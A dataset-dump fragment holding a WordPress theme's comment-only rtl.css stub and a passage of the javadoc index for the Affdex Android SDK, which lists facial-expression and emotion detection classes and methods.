path
stringlengths 5
312
| repo_name
stringlengths 5
116
| content
stringlengths 2
1.04M
|
|---|---|---|
wp-content/themes/mimosa/rtl.css
|
rememberlenny/Mimosa
|
/*
Theme Name: mimosa
Adding support for language written in a Right To Left (RTL) direction is easy -
it's just a matter of overwriting all the horizontal positioning attributes
of your CSS stylesheet in a separate stylesheet file named rtl.css.
http://codex.wordpress.org/Right_to_Left_Language_Support
*/
/*
body {
direction: rtl;
unicode-bidi: embed;
}
*/
|
pages/platforms/v3_2/android/javadoc/index-all.html
|
Affectiva/developerportal
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_51) on Tue Jan 24 09:57:51 EST 2017 -->
<title>Index (Affdex Android SDK Java Documentation)</title>
<meta name="date" content="2017-01-24">
<link rel="stylesheet" type="text/css" href="./stylesheet.css" title="Style">
</head>
<body>
<script type="text/javascript"><!--
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Index (Affdex Android SDK Java Documentation)";
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar_top">
<!-- -->
</a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="./overview-summary.html">Overview</a></li>
<li>Package</li>
<li>Class</li>
<li><a href="./overview-tree.html">Tree</a></li>
<li><a href="./deprecated-list.html">Deprecated</a></li>
<li class="navBarCell1Rev">Index</li>
<li><a href="./help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><em><img src="./affectiva.png"></em></div>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="./index.html?index-all.html" target="_top">Frames</a></li>
<li><a href="index-all.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="./allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip-navbar_top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="contentContainer"><a href="#_A_">A</a> <a href="#_C_">C</a> <a href="#_D_">D</a> <a href="#_E_">E</a> <a href="#_F_">F</a> <a href="#_G_">G</a> <a href="#_I_">I</a> <a href="#_L_">L</a> <a href="#_M_">M</a> <a href="#_O_">O</a> <a href="#_P_">P</a> <a href="#_Q_">Q</a> <a href="#_R_">R</a> <a href="#_S_">S</a> <a href="#_T_">T</a> <a href="#_V_">V</a> <a name="_A_">
<!-- -->
</a>
<h2 class="title">A</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/AffdexException.html" title="class in com.affectiva.android.affdex.sdk"><span class="strong">AffdexException</span></a> - Exception in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/AffdexException.html#AffdexException(java.lang.String)">AffdexException(String)</a></span> - Constructor for exception com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/AffdexException.html" title="class in com.affectiva.android.affdex.sdk">AffdexException</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/AffdexException.html#AffdexException(java.lang.String, java.lang.Throwable)">AffdexException(String, Throwable)</a></span> - Constructor for exception com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/AffdexException.html" title="class in com.affectiva.android.affdex.sdk">AffdexException</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#appearance">appearance</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
</dl>
<a name="_C_">
<!-- -->
</a>
<h2 class="title">C</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">CameraDetector</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A Detector for processing a stream of frames received from the device's camera</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#CameraDetector(Context, com.affectiva.android.affdex.sdk.detector.CameraDetector.CameraType, SurfaceView, int, com.affectiva.android.affdex.sdk.detector.Detector.FaceDetectorMode)">CameraDetector(Context, CameraDetector.CameraType, SurfaceView, int, Detector.FaceDetectorMode)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">Creates a CameraDetector.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html#CameraDetector(Context, com.affectiva.android.affdex.sdk.detector.CameraDetector.CameraType, SurfaceView)">CameraDetector(Context, CameraDetector.CameraType, SurfaceView)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">CameraDetector</a></dt>
<dd>
<div class="block">Creates a CameraDetector.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraEventListener.html" title="interface in com.affectiva.android.affdex.sdk.detector"><span class="strong">CameraDetector.CameraEventListener</span></a> - Interface in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Reports events related to the handling of the Android Camera by <code>CameraDetector</code>.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/CameraDetector.CameraType.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">CameraDetector.CameraType</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">This enumeration is used to specify which camera to use during recording.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#colorFormat">colorFormat</a></span> - Variable in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a> - package com.affectiva.android.affdex.sdk</dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a> - package com.affectiva.android.affdex.sdk.detector</dt>
<dd> </dd>
</dl>
<a name="_D_">
<!-- -->
</a>
<h2 class="title">D</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Detector</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Welcome to the Affdex SDK for Android! With this SDK, your app will be able to detect facial expressions using the
built-in camera, or via a file on your device.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceDetectorMode.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Detector.FaceDetectorMode</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Detector.FaceListener.html" title="interface in com.affectiva.android.affdex.sdk.detector"><span class="strong">Detector.FaceListener</span></a> - Interface in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Detector.ImageListener.html" title="interface in com.affectiva.android.affdex.sdk.detector"><span class="strong">Detector.ImageListener</span></a> - Interface in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">This interface provides methods that the Detector uses to communicate to users of the class.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#disableAnalytics()">disableAnalytics()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Disable the SDK from sending anonymous frame based events to Affectiva.</div>
</dd>
</dl>
<a name="_E_">
<!-- -->
</a>
<h2 class="title">E</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#emojis">emojis</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#emotions">emotions</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#enableAnalytics()">enableAnalytics()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd>
<div class="block">Enable the SDK to send anonymous frame based events to Affectiva.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#expressions">expressions</a></span> - Variable in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
</dl>
<a name="_F_">
<!-- -->
</a>
<h2 class="title">F</h2>
<dl>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Represents a face found within a processed <code>Frame</code></div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.html#Face()">Face()</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.html" title="class in com.affectiva.android.affdex.sdk.detector">Face</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.AGE</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Enumerates the age ranges which the SDK is capable of identifying for found
faces.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Appearance</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.EMOJI.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.EMOJI</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Enumerates the emojis that can be returned by
<code>Face.emojis.getDominantEmoji()</code>.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emojis.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Emojis</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for emoji metric scores.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Emotions</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for emotion metric scores.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.ETHNICITY.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.ETHNICITY</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Enumerates the ethnicities which the SDK is capable of identifying for found
faces.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Expressions</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for expression metric scores.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.FaceQuality.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.FaceQuality</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for face quality metric scores.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.GENDER.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.GENDER</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Enumerates the Face's possible gender values: MALE or FEMALE if
a strong match could be made, otherwise UNKNOWN if it was not
possible to determine gender.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.GLASSES.html" title="enum in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.GLASSES</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">Enumerates whether the Face is wearing glasses: YES or NO.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Measurements</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for measurement metric scores.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">Face.Measurements.Orientation</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A container for orientation scores.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html#Face.Measurements.Orientation()">Face.Measurements.Orientation()</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Measurements.Orientation.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Measurements.Orientation</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk"><span class="strong">Frame</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd>
<div class="block">A wrapper class for images, which can originate from different types (like <code>byte[]</code> and
<code>Bitmap</code>).</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#Frame()">Frame()</a></span> - Constructor for class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd> </dd>
<dt><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk"><span class="strong">Frame.BitmapFrame</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd>
<div class="block">A class to wrap an image in a <code>Bitmap</code> format to a <code>Frame</code> readable by the SDK.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#Frame.BitmapFrame(Bitmap, com.affectiva.android.affdex.sdk.Frame.COLOR_FORMAT)">Frame.BitmapFrame(Bitmap, Frame.COLOR_FORMAT)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd>
<div class="block">Constructs a <code>BitmapFrame</code> that wraps the specified <code>Bitmap</code>.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html" title="class in com.affectiva.android.affdex.sdk"><span class="strong">Frame.ByteArrayFrame</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd>
<div class="block">A class to wrap an image in a byte array format to a <code>Frame</code> readable by the SDK.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html#Frame.ByteArrayFrame(byte[], int, int, com.affectiva.android.affdex.sdk.Frame.COLOR_FORMAT)">Frame.ByteArrayFrame(byte[], int, int, Frame.COLOR_FORMAT)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.ByteArrayFrame</a></dt>
<dd>
<div class="block">Constructs a <code>ByteArrayFrame</code> that wraps the specified byte array.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/Frame.COLOR_FORMAT.html" title="enum in com.affectiva.android.affdex.sdk"><span class="strong">Frame.COLOR_FORMAT</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd>
<div class="block">Defines the <a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk"><code>Frame</code></a>'s color format.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/Frame.ROTATE.html" title="enum in com.affectiva.android.affdex.sdk"><span class="strong">Frame.ROTATE</span></a> - Enum in <a href="./com/affectiva/android/affdex/sdk/package-summary.html">com.affectiva.android.affdex.sdk</a></dt>
<dd>
<div class="block">Defines the desired rotation before processing.</div>
</dd>
<dt><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector"><span class="strong">FrameDetector</span></a> - Class in <a href="./com/affectiva/android/affdex/sdk/detector/package-summary.html">com.affectiva.android.affdex.sdk.detector</a></dt>
<dd>
<div class="block">A Detector used to process a sequence of pushed frames.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#FrameDetector(Context, int, com.affectiva.android.affdex.sdk.detector.Detector.FaceDetectorMode)">FrameDetector(Context, int, Detector.FaceDetectorMode)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Creates a FrameProcessor.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html#FrameDetector(Context)">FrameDetector(Context)</a></span> - Constructor for class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/FrameDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">FrameDetector</a></dt>
<dd>
<div class="block">Creates a FrameProcessor.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html#frameReady(byte[], int, int, com.affectiva.android.affdex.sdk.Frame.COLOR_FORMAT, long, com.affectiva.android.affdex.sdk.Frame.ROTATE)">frameReady(byte[], int, int, Frame.COLOR_FORMAT, long, Frame.ROTATE)</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/VideoFileDetector.html" title="class in com.affectiva.android.affdex.sdk.detector">VideoFileDetector</a></dt>
<dd> </dd>
</dl>
<a name="_G_">
<!-- -->
</a>
<h2 class="title">G</h2>
<dl>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html#getAge()">getAge()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Appearance.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Appearance</a></dt>
<dd>
<div class="block">Gets the age group, an <a href="./com/affectiva/android/affdex/sdk/detector/Face.AGE.html" title="enum in com.affectiva.android.affdex.sdk.detector"><code>Face.AGE</code></a> enum.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getAnger()">getAnger()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Anger score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getAttention()">getAttention()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Attention score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html#getBitmap()">getBitmap()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.BitmapFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.BitmapFrame</a></dt>
<dd>
<div class="block">Get underlying <code>Bitmap</code> object.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.FaceQuality.html#getBrightness()">getBrightness()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.FaceQuality.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.FaceQuality</a></dt>
<dd>
<div class="block">Indicates how well the face is lit for purposes of analysis.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getBrowFurrow()">getBrowFurrow()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Brow Furrow score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getBrowRaise()">getBrowRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Brow Raise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html#getByteArray()">getByteArray()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.ByteArrayFrame.html" title="class in com.affectiva.android.affdex.sdk">Frame.ByteArrayFrame</a></dt>
<dd>
<div class="block">Get underlying byte array of pixels.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getCheekRaise()">getCheekRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Cheek Raise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html#getChinRaise()">getChinRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Expressions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Expressions</a></dt>
<dd>
<div class="block">Gets the Chin Raise score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/Frame.html#getColorFormat()">getColorFormat()</a></span> - Method in class com.affectiva.android.affdex.sdk.<a href="./com/affectiva/android/affdex/sdk/Frame.html" title="class in com.affectiva.android.affdex.sdk">Frame</a></dt>
<dd>
<div class="block">Get <code>Frame</code>'s color format.</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html#getContempt()">getContempt()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Face.Emotions.html" title="class in com.affectiva.android.affdex.sdk.detector">Face.Emotions</a></dt>
<dd>
<div class="block">Gets the Contempt score, a float in the range [0,100].</div>
</dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectAge()">getDetectAge()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectAnger()">getDetectAnger()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectAttention()">getDetectAttention()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectBrowFurrow()">getDetectBrowFurrow()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectBrowRaise()">getDetectBrowRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectCheekRaise()">getDetectCheekRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectChinRaise()">getDetectChinRaise()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectContempt()">getDetectContempt()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectDimpler()">getDetectDimpler()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
<dt><span class="strong"><a href="./com/affectiva/android/affdex/sdk/detector/Detector.html#getDetectDisgust()">getDetectDisgust()</a></span> - Method in class com.affectiva.android.affdex.sdk.detector.<a href="./com/affectiva/android/affdex/sdk/detector/Detector.html" title="class in com.affectiva.android.affdex.sdk.detector">Detector</a></dt>
<dd> </dd>
